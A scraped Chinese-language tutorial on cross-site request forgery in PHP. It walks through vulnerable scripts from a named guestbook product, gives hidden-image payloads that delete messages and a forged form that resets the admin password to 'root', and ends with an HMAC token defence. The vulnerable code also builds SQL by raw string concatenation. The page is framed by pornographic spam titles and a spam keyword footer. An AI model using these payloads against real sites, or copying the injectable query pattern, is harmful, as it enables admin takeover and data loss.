国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 開發 > PHP > 正文

php漏洞之跨網站請求偽造與防止偽造方法

2024-05-04 21:48:16
字體:
來源:轉載
供稿:網友

今天我來給大家介紹在php中跨網站請求偽造的實現方法與最后我們些常用的防止偽造的具體操作方法,有需要了解的朋友可進入參考.

偽造跨站請求介紹

偽造跨站請求比較難以防范,而且危害巨大,攻擊者可以通過這種方式惡作劇,發spam信息,刪除數據等等,這種攻擊常見的表現形式有:

偽造鏈接,引誘用戶點擊,或是讓用戶在不知情的情況下訪問. 

偽造表單,引誘用戶提交,表單可以是隱藏的,用圖片或鏈接的形式偽裝.

比較常見而且也很廉價的防范手段是在所有可能涉及用戶寫操作的表單中加入一個隨機且變換頻繁的字符串,然后在處理表單的時候對這個字符串進行檢查。這個隨機字符串如果和當前用戶身份相關聯的話,那么攻擊者偽造請求會比較麻煩.

如果攻擊者以隱藏的方式發送給目標用戶鏈接

<a src="/buy.php?item=watch&num=1000"/>,那么如果目標用戶不小心訪問以后,購買的數量就成了1000個.

實例,隨緣網絡PHP留言板V1.0,代碼如下,任意刪除留言:

  1. //delbook.php 此頁面用于刪除留言 
  2. <?php 
  3. include_once("dlyz.php");    //dlyz.php用戶驗證權限,當權限是admin的時候方可刪除留言 
  4. include_once("../conn.php"); 
  5. $del=$_GET["del"]; 
  6. $id=$_GET["id"]; 
  7. if ($del=="data"
  8. $ID_Dele= implode(",",$_POST['adid']); 
  9. $sql="delete from book where id in (".$ID_Dele.")"
  10. mysql_query($sql); 
  11. else 
  12. $sql="delete from book where id=".$id//傳遞要刪除的留言ID 
  13. mysql_query($sql); 
  14. mysql_close($conn); 
  15. echo "<script language='javascript'>";  
  16. echo "alert('刪除成功!');"
  17. echo " location='book.php';";  
  18. echo "</script>"
  19. ?> 

當我們具有admin權限,提交http://localhost/manage/delbook.php?id=2 時,就會刪除id為2的留言.

利用方法,我們使用普通用戶留言,源代碼方式,內容為如下代碼:

  1. <img src="delbook.php?id=2" /> 
  2.  
  3. <img src="delbook.php?id=3" /> 
  4.  
  5. <img src="delbook.php?id=4" /> 
  6.  
  7. <img src="delbook.php?id=5" /> 

插入4張圖片鏈接分別刪除4個id留言,然后我們返回首頁瀏覽看,沒有什么變化,圖片顯示不了,現在我們再用管理員賬號登陸后,來刷新首頁,會發現留言就剩一條,其他在圖片鏈接中指定的ID號的留言,全部都被刪除.

攻擊者在留言中插入隱藏的圖片鏈接,此鏈接具有刪除留言的作用,而攻擊者自己訪問這些圖片鏈接的時候,是不具有權限的,所以看不到任何效果,但是當管理員登陸后,查看此留言,就會執行隱藏的鏈接,而他的權限又是足夠大的,從而這些留言就被刪除了.

修改管理員密碼,代碼如下:

  1. //pass.php 
  2. if($_GET["act"]) 
  3. $username=$_POST["username"]; 
  4. $sh=$_POST["sh"]; 
  5. $gg=$_POST["gg"]; 
  6. $title=$_POST["title"]; 
  7. $copyright=$_POST["copyright"]."<br/>設計制作:<a href=http://m.survivalescaperooms.com>廈門隨緣網絡科技</a>"
  8. $password=md5($_POST["password"]); 
  9. if(emptyempty($_POST["password"])) 
  10. $sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1"
  11. else 
  12. $sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1"
  13. mysql_query($sql); 
  14. mysql_close($conn); 
  15. echo "<script language='javascript'>";  
  16. echo "alert('修改成功!');"
  17. echo " location='pass.php';";  
  18. echo "</script>"
  19. 這個文件用于修改管理密碼和網站設置的一些信息,我們可以直接構造如下表單: 
  20. <body> 
  21. <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1"
  22. <input type="radio" value="1"  name="sh"
  23. <input type="radio" name="sh" checked value="0">  
  24. <input type="text" name="username" value="root"
  25. <input type="password" name="password" value="root">  
  26. <input type="text"  name="title"  value="隨緣網絡PHP留言板V1.0(帶審核功能)" > 
  27. <textarea  name="gg"  rows="6" cols="80" >歡迎您安裝使用隨緣網絡PHP留言板V1.0(帶審核功能)!</textarea> 
  28. <textarea  name="copyright"  rows="6" cols="80" >隨緣網絡PHP留言本V1.0  版權所有:廈門隨緣網絡科技 2005-2009<br/>承接網站建設及系統定制 提供優惠主機域名</textarea> 
  29. </form> 
  30. </body>  

存為attack.html,放到自己網站上http://m.survivalescaperooms.com此頁面訪問后會自動向目標程序的pass.php提交參數,用戶名修改為root,密碼修改為root,然后我們去留言板發一條留言,隱藏這個鏈接,管理訪問以后,他的用戶名和密碼全部修改成了root.

防止偽造跨站請求

yahoo對付偽造跨站請求的辦法是在表單里加入一個叫.crumb的隨機串;而facebook也有類似的解決辦法,它的表單里常常會有post_form_id和fb_dtsg.

隨機串代碼實現,咱們按照這個思路,山寨一個crumb的實現,代碼如下:

  1. class Crumb {  
  2. CONST SALT = "your-secret-salt";  
  3. static $ttl = 7200;  
  4. static public function challenge($data) {  
  5. return hash_hmac('md5'$data, self::SALT);  
  6. }  
  7. static public function issueCrumb($uid$action = -1) {  
  8. $i = ceil(time() / self::$ttl);  
  9. return substr(self::challenge($i . $action . $uid), -12, 10);  
  10. }  
  11. static public function verifyCrumb($uid$crumb$action = -1) {  
  12. $i = ceil(time() / self::$ttl);  
  13. if(substr(self::challenge($i . $action . $uid), -12, 10) == $crumb ||  
  14. substr(self::challenge(($i - 1) . $action . $uid), -12, 10) == $crumb)  
  15. return true;  
  16. return false;  
  17. }  

代碼中的$uid表示用戶唯一標識,而$ttl表示這個隨機串的有效時間.

應用示例,構造表單,在表單中插入一個隱藏的隨機串crumb,代碼如下:

  1. <form method="post" action="demo.php">  
  2. <input type="hidden" name="crumb" value="<?php echo Crumb::issueCrumb($uid)?>">  
  3. <input type="text" name="content">  
  4. <input type="submit">  
  5. </form> 

處理表單 demo.php,對crumb進行檢查,代碼如下:

  1. <?php  
  2. if(Crumb::verifyCrumb($uid$_POST['crumb'])) {  
  3. //按照正常流程處理表單  
  4. else {  
  5. //crumb校驗失敗,錯誤提示流程  
  6. }  
  7. ?> 

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 盘锦市| 瓮安县| 五大连池市| 来安县| 洪江市| 阿拉善盟| 独山县| 车致| 肥城市| 英超| 白银市| 滦平县| 天镇县| 房产| 凤阳县| 静乐县| 东乡| 故城县| 平湖市| 合阳县| 绥棱县| 吴旗县| 靖江市| 临海市| 惠水县| 武胜县| 张家口市| 额济纳旗| 嘉祥县| 漠河县| 凤阳县| 贞丰县| 会理县| 精河县| 略阳县| 孟村| 思南县| 平果县| 扎鲁特旗| 玉山县| 江门市|